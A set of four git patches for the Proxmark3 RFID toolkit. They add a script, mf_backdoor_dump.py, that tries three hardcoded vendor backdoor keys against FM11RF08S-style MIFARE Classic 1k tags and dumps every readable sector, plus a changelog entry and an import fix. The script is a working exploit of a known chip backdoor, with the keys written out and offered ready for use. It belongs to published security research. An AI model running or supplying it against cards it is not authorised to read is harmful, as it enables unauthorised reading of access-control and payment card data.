From 145cd67b0eb0e7c831743293e09f1b1d18bdaf1a Mon Sep 17 00:00:00 2001
From: Aptimex <adammerrill13@gmail.com>
Date: Wed, 9 Oct 2024 15:13:47 -0600
Subject: [PATCH 1/4] add mf_backdoor_dump script

---
 client/pyscripts/mf_backdoor_dump.py | 62 ++++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 client/pyscripts/mf_backdoor_dump.py

diff --git a/client/pyscripts/mf_backdoor_dump.py b/client/pyscripts/mf_backdoor_dump.py
new file mode 100644
index 000000000..e8836c358
--- /dev/null
+++ b/client/pyscripts/mf_backdoor_dump.py
@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+
+# Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read
+# Tested on vulnerable 1k chips only
+# Based on the work in this paper: https://eprint.iacr.org/2024/1275
+
+import pm3
+import os
+
+TOTAL_SECTORS = 16 #1k chips
+
+BACKDOOR_KEYS = ["A396EFA4E24F", "A31667A8CEC1", "518B3354E760"]
+WORKING_KEY = None
+
+required_version = (3, 8)
+if sys.version_info < required_version:
+    print(f"Python version: {sys.version}")
+    print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.")
+    exit()
+p = pm3.pm3()
+
+# Test all the keys first to see which one works (if any)
+for bk in BACKDOOR_KEYS:
+    p.console(f"hf mf rdbl -c 4 --key {bk} --blk 0")
+    output = p.grabbed_output.split('\n')
+    
+    if "auth error" in output[0].lower():
+        continue
+    elif "can't select card" in output[0].lower():
+        print("Error reading the tag.")
+        exit()
+    else:
+        WORKING_KEY = bk
+        break
+    
+if not WORKING_KEY:
+    print("None of the backdoor keys seem to work with this tag.")
+    exit()
+
+print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...")
+print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's")
+
+header = False
+# Read every sector
+for i in range(TOTAL_SECTORS):
+    p.console(f"hf mf rdsc -c 4 --key {WORKING_KEY} -s {i}")
+    
+    start = False
+    for line in p.grabbed_output.split('\n'):
+        if not header:
+            print(line)
+        elif start and len(line) > 0:
+            print(line)
+            continue
+        
+        if "----------" in line:
+            start = True
+            header = True
+            continue
+        else:
+            continue
+        

From c1dbe2f8c1d65a6d9b852f2230cde72dc5dc9986 Mon Sep 17 00:00:00 2001
From: Aptimex <adammerrill13@gmail.com>
Date: Wed, 9 Oct 2024 15:21:41 -0600
Subject: [PATCH 2/4] add line to changelog

---
 CHANGELOG.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 5843bbcac..c0843d8d8 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -33,6 +33,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac
 - Fixed hardnested on AVX512F #2410 (@xianglin1998)
 - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond)
 - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi)
+- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. 
 
 ## [Backdoor.4.18994][2024-09-10]
 - Changed flashing messages to be less scary (@iceman1001)

From 420afa279b590a5d322ee44908c8916740a09da0 Mon Sep 17 00:00:00 2001
From: Aptimex <adammerrill13@gmail.com>
Date: Wed, 9 Oct 2024 15:23:28 -0600
Subject: [PATCH 3/4] add my username

---
 CHANGELOG.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index c0843d8d8..105ddf738 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -33,7 +33,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac
 - Fixed hardnested on AVX512F #2410 (@xianglin1998)
 - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond)
 - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi)
-- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. 
+- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. (@Aptimex)
 
 ## [Backdoor.4.18994][2024-09-10]
 - Changed flashing messages to be less scary (@iceman1001)

From bc7cc7c5deb95b926528b5757739fd27cdd4de5c Mon Sep 17 00:00:00 2001
From: Aptimex <adammerrill13@gmail.com>
Date: Wed, 9 Oct 2024 16:00:15 -0600
Subject: [PATCH 4/4] fix missing import

---
 client/pyscripts/mf_backdoor_dump.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/client/pyscripts/mf_backdoor_dump.py b/client/pyscripts/mf_backdoor_dump.py
index e8836c358..897e46381 100644
--- a/client/pyscripts/mf_backdoor_dump.py
+++ b/client/pyscripts/mf_backdoor_dump.py
@@ -6,6 +6,7 @@
 
 import pm3
 import os
+import sys
 
 TOTAL_SECTORS = 16 #1k chips